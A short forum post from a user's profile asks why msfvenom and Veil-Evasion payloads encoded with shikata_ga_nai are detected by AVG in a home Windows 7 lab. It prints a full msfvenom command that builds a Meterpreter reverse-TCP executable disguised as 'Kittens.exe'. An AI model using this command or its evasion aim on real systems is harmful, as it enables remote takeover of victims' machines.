Jump to content

Hadeus

Members
  • Posts

    2
  • Joined

  • Last visited

Posts posted by Hadeus

  1. I've been pentesting on on my Windows 7 VM lately with shikata_ga_nai encoded payloads I've been generating vai Veil-Evasion and msfvenom.

    For example, I have been using the windows/meterpreter/reverse_tcp reverse stager to call back to me on my handler on kali and it works BUT thats only when AV is turned off, otherwise my payloads are detected by AV (AVG)

    Are shikata_ga_nai signatures now detectable via AV? Or perhaps I'm encoding my payloads wrong?

    Here is an example of one of my payloads

    root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe LHOST=192.168.32.130 LPORT=4444 > Kittens.exe

×
×
  • Create New...